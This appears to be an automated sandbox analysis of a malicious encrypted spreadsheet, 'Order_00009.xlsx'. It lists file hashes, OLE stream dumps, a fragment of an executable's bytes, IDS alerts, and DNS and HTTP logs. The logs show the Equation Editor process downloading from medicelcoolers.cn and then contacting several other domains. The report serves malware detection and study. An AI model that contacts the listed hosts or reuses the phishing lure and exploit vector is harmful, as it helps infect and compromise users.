                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@.................................D...O........$................... ......(................................................ ............... ..H............text........ ...................... ..`.rsrc....$.......&..................@..@.reloc....... ......................@..B................x.......H...........\.......K...@K..............................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....*".(.....*..0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.995877006960585
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:Order_00009.xlsx
                                                                                                                                                          File size:1419776
                                                                                                                                                          MD5:f99314a2a08dbbc7ddff20a83f1a5f32
                                                                                                                                                          SHA1:1914f9f5eedef3300ced36713b4bea07597679c4
                                                                                                                                                          SHA256:2f3772ae0a61ae1f913ba2e34f97dd86e7c2e619bc839171f8ff67cb06fbb209
                                                                                                                                                          SHA512:909da3c17d063e12f01f5fc8cbe3bf0e57f6a595c686952e4942d5a337ea373f464a95a053ccbdf9b3fd0fef69b6ba2f95153fe3ccb6c6cc2c1f9ca6e021b355
                                                                                                                                                          SSDEEP:24576:HY9ENCY1fiFDH7FsxxmGGCBhRnxiH/rixCxnJSTFN97d/D3DZB8iUXMUopYEbC5:rUY1sFsxxzGCBnxQmxqnJSTFN97Z3DZC
                                                                                                                                                          File Content Preview:........................>...............................................................................................z.......|.......~...............z.......|..............................................................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "Order_00009.xlsx"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:False
                                                                                                                                                          Application Name:unknown
                                                                                                                                                          Encrypted Document:True
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:64
                                                                                                                                                          Entropy:2.73637206947
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:112
                                                                                                                                                          Entropy:2.7597816111
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:200
                                                                                                                                                          Entropy:3.13335930328
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:76
                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 1404856
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:1404856
                                                                                                                                                          Entropy:7.99985530871
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. o . . . . . . j . . @ . . E W + . . _ . : . . . . . . . u . . x F . k . " . g . . . j . . . . Q . e s . + # . . . . . . 6 ~ . . . z . U 3 . . * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K ! . . ; . . l W & * . } . . j K !
                                                                                                                                                          Data Raw:a2 6f 15 00 00 00 00 00 6a dc a4 40 ed 0e 45 57 2b 80 fa 5f bb 3a d2 d6 08 07 a3 c8 aa 75 02 ce 78 46 9b 6b 1b 22 a6 67 94 de a8 6a 87 b5 9d 17 51 eb 65 73 0a 2b 23 91 a2 af 87 e7 2e 36 7e 0b 9a 0b 7a e7 55 33 1c fd 2a df 7d 0f f4 6a 4b 21 88 aa 3b 08 01 6c 57 26 2a df 7d 0f f4 6a 4b 21 88 aa 3b 08 01 6c 57 26 2a df 7d 0f f4 6a 4b 21 88 aa 3b 08 01 6c 57 26 2a df 7d 0f f4 6a 4b 21
                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:224
                                                                                                                                                          Entropy:4.52818090397
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . ~ . 4 X . i . . , . . . . . . . 9 . . M C . . . . . u . . . . . . . " ! . . . . . . . . . . . . . . . . 0 p . 2 . . . % . . P . .
                                                                                                                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                          Network Behavior

                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                          01/13/21-17:24:10.186613TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22185.26.106.165
                                                                                                                                                          01/13/21-17:25:19.753611ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                          01/13/21-17:25:20.473226ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                          01/13/21-17:25:29.775404TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22
                                                                                                                                                          01/13/21-17:25:40.625456TCP1201ATTACK-RESPONSES 403 Forbidden804916835.172.94.1192.168.2.22
                                                                                                                                                          01/13/21-17:25:52.140318ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 13, 2021 17:24:10.131752968 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.186067104 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.186180115 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.186613083 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.239715099 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.240417004 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.240560055 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.240569115 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.240588903 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.240612984 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.240628958 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.240647078 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.240667105 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.240673065 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.240699053 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.240720987 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.240747929 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.240879059 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.240919113 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.241018057 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.241075993 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.241102934 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.241168022 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.246692896 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.295902967 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.295944929 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.295970917 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.295996904 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.296094894 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.296787977 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297030926 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297080040 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297106028 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297125101 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297141075 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297147989 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297157049 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297168016 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297174931 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297184944 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297199965 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297214985 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297224998 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297247887 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297271967 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297283888 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297296047 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297307968 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297322989 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297333002 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297348022 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297370911 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297404051 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297415018 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297440052 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.297499895 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297504902 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297605991 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.297622919 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.299314022 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.349452972 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.349492073 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.349519968 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.349545956 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.349570990 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.349594116 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.349611998 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.349673986 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.349680901 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.349685907 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350496054 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350528002 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350553036 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350569010 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350577116 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350590944 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350596905 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350606918 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350620031 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350636959 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350661039 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350662947 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350673914 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350687027 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350702047 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350712061 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350730896 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350735903 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350748062 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350759983 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350775003 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350785971 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350812912 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350815058 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350836992 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350841999 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350853920 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350861073 CET8049165185.26.106.165192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.350878000 CET4916580192.168.2.22185.26.106.165
                                                                                                                                                          Jan 13, 2021 17:24:10.350887060 CET8049165185.26.106.165192.168.2.22

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 13, 2021 17:24:09.576432943 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:24:09.940781116 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:09.941062927 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:24:10.000277042 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.000508070 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:24:10.061826944 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:24:10.062150002 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:24:10.118412018 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:16.648511887 CET5309953192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:17.659132004 CET5309953192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:18.673178911 CET5309953192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:19.340603113 CET53530998.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:19.753330946 CET53530998.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:20.473000050 CET53530998.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:24.361514091 CET5283853192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:24.434632063 CET53528388.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:29.537081957 CET6120053192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:29.595119953 CET53612008.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:34.816098928 CET4954853192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:35.301371098 CET53495488.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:40.303303957 CET5562753192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:40.370840073 CET53556278.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:50.675798893 CET5600953192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:51.685638905 CET5600953192.168.2.228.8.8.8
                                                                                                                                                          Jan 13, 2021 17:25:52.125325918 CET53560098.8.8.8192.168.2.22
                                                                                                                                                          Jan 13, 2021 17:25:52.140252113 CET53560098.8.8.8192.168.2.22

                                                                                                                                                          ICMP Packets

                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                          Jan 13, 2021 17:25:19.753611088 CET192.168.2.228.8.8.8d007(Port unreachable)Destination Unreachable
                                                                                                                                                          Jan 13, 2021 17:25:20.473226070 CET192.168.2.228.8.8.8d007(Port unreachable)Destination Unreachable
                                                                                                                                                          Jan 13, 2021 17:25:52.140317917 CET192.168.2.228.8.8.8d01b(Port unreachable)Destination Unreachable

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Jan 13, 2021 17:24:09.576432943 CET192.168.2.228.8.8.80xb305Standard query (0)medicelcoolers.cnA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:24:09.941062927 CET192.168.2.228.8.8.80xb305Standard query (0)medicelcoolers.cnA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:24:10.000508070 CET192.168.2.228.8.8.80xb305Standard query (0)medicelcoolers.cnA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:24:10.062150002 CET192.168.2.228.8.8.80xb305Standard query (0)medicelcoolers.cnA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:16.648511887 CET192.168.2.228.8.8.80xa14dStandard query (0)www.herbmedia.netA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:17.659132004 CET192.168.2.228.8.8.80xa14dStandard query (0)www.herbmedia.netA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:18.673178911 CET192.168.2.228.8.8.80xa14dStandard query (0)www.herbmedia.netA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:24.361514091 CET192.168.2.228.8.8.80xccffStandard query (0)www.fixmygearfast.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:29.537081957 CET192.168.2.228.8.8.80x2e78Standard query (0)www.brainandbodystrengthcoach.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:34.816098928 CET192.168.2.228.8.8.80x2f03Standard query (0)www.beamsubway.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:40.303303957 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.stattests.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:50.675798893 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.shemaledreamz.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:51.685638905 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.shemaledreamz.comA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Jan 13, 2021 17:24:09.940781116 CET8.8.8.8192.168.2.220xb305No error (0)medicelcoolers.cn185.26.106.165A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:24:10.000277042 CET8.8.8.8192.168.2.220xb305No error (0)medicelcoolers.cn185.26.106.165A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:24:10.061826944 CET8.8.8.8192.168.2.220xb305No error (0)medicelcoolers.cn185.26.106.165A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:24:10.118412018 CET8.8.8.8192.168.2.220xb305No error (0)medicelcoolers.cn185.26.106.165A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:19.340603113 CET8.8.8.8192.168.2.220xa14dServer failure (2)www.herbmedia.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:19.753330946 CET8.8.8.8192.168.2.220xa14dServer failure (2)www.herbmedia.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:20.473000050 CET8.8.8.8192.168.2.220xa14dServer failure (2)www.herbmedia.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:24.434632063 CET8.8.8.8192.168.2.220xccffNo error (0)www.fixmygearfast.comfixmygearfast.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:24.434632063 CET8.8.8.8192.168.2.220xccffNo error (0)fixmygearfast.com160.153.136.3A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:29.595119953 CET8.8.8.8192.168.2.220x2e78No error (0)www.brainandbodystrengthcoach.combrainandbodystrengthcoach.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:29.595119953 CET8.8.8.8192.168.2.220x2e78No error (0)brainandbodystrengthcoach.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:35.301371098 CET8.8.8.8192.168.2.220x2f03Name error (3)www.beamsubway.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:40.370840073 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.stattests.coms.multiscreensite.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:40.370840073 CET8.8.8.8192.168.2.220x3c4eNo error (0)s.multiscreensite.com35.172.94.1A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:40.370840073 CET8.8.8.8192.168.2.220x3c4eNo error (0)s.multiscreensite.com100.24.208.97A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:52.125325918 CET8.8.8.8192.168.2.220x6ec7No error (0)www.shemaledreamz.com45.11.187.140A (IP address)IN (0x0001)
                                                                                                                                                          Jan 13, 2021 17:25:52.140252113 CET8.8.8.8192.168.2.220x6ec7No error (0)www.shemaledreamz.com45.11.187.140A (IP address)IN (0x0001)

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • medicelcoolers.cn
                                                                                                                                                          • www.fixmygearfast.com
                                                                                                                                                          • www.brainandbodystrengthcoach.com
                                                                                                                                                          • www.stattests.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          0192.168.2.2249165185.26.106.16580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
